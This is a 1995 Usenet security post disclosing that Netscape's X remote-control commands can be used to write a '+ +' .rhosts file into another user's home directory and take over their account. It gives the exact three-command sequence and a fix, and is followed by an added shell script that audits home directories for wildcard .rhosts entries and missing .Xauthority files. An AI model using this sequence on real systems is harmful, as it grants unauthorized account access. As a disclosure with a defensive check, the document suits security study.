Article 30114 of alt.security:
From: "Denis Auroux (MXK)"
Newsgroups: alt.security,comp.security.unix
Subject: Netscape hole without .Xauthority
Date: 27 Sep 1995 23:00:29 GMT
Organization: Ecole Normale Superieure
Message-ID: <44cl2d$s9h@nef.ens.fr>

There's a huge hole in the Netscape remote control mechanism for the X-Windows based clients.

Potential impact: anybody can become any user that uses Netscape on any system without sufficient X security.

Let's suppose that you have an account on a target machine, where somebody is using Netscape, and either the xhost checking is disabled, or you can set the xhost yourself (e.g. if you have an account and the target user has no .Xauthority, as is frequent in university computer rooms). Then you can gain access to the target user's account using the following steps:

- make a text file containing only "+ +" accessible (as file, as URL, or whatever you like) to the target Netscape client. This is quite easy, either if you have a personal WWW page (http://... URL) or an account on the target machine (file://... URL), or even by uploading it to an anon FTP
- set your DISPLAY environment variable to the target display
- run the following set of commands:

    netscape -noraise -remote "openURL()"
    netscape -noraise -remote "saveAs(.rhosts)"
    netscape -noraise -remote back

In the second command, the path should be specified whenever possible (~ is not accepted).

If the target user does not already have a .rhosts and is not looking at that precise moment, then the chances are it worked!
Solution to the problem: every user concerned should either create a Xauthority file, or stop using Netscape.

MXK

PS: WHY do they bother with PGP and RSA security when they keep such holes????

+------------------------------------+---------------------------------+
| Denis AUROUX (MXK)                 | Ecole Normale Superieure        |
| 255 rue Saint-Jacques              | 45 rue d'Ulm                    |
| 75005 PARIS FRANCE                 | 75005 PARIS                     |
| email: auroux@clipper.ens.fr       | FRANCE                          |
+------------------------------------+---------------------------------+
| This .sig is SHAREWARE. If you use it often, please send me $50.     |
| After registering you will receive a fully functional .sig and all   |
| updates for free.                                                    |
+----------------------------------------------------------------------+
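An added defensive check, not part of the original post: a small POSIX shell audit (helper names are my own) that flags home directories whose .rhosts carries a wildcard "+" entry, the artifact the steps above would leave behind, and home directories with no .Xauthority, the condition the poster's fix removes.

```shell
#!/bin/sh
# Added defensive audit (not from the original post). Hypothetical helper
# names. It flags the two conditions the post describes: a ~/.rhosts that
# trusts any host / any user ("+ +"), and a home directory with no
# ~/.Xauthority, so X access control depends on xhost alone.

# rhosts_is_wildcard FILE: succeed (0) if any entry uses a '+' wildcard for
# the host or the user field. Comment lines and blank lines are ignored.
rhosts_is_wildcard() {
    f="$1"
    [ -f "$f" ] || return 1
    while read -r host user rest || [ -n "$host" ]; do
        case "$host" in '#'*|'') continue ;; esac
        [ "$host" = "+" ] && return 0
        [ "$user" = "+" ] && return 0
    done < "$f"
    return 1
}

# audit_home DIR: print one line per finding and return the number of
# findings, so a return of 0 means the home directory is clean on both counts.
audit_home() {
    dir="$1"
    n=0
    if rhosts_is_wildcard "$dir/.rhosts"; then
        echo "$dir: .rhosts grants wildcard trust (+ entry)"
        n=$((n + 1))
    fi
    if [ ! -f "$dir/.Xauthority" ]; then
        echo "$dir: no .Xauthority, X access control depends on xhost only"
        n=$((n + 1))
    fi
    return "$n"
}

# Usage: sh audit_rhosts.sh /home/alice /home/bob
# Every directory given on the command line is audited; findings are printed.
for d in "$@"; do
    audit_home "$d" || :
done
```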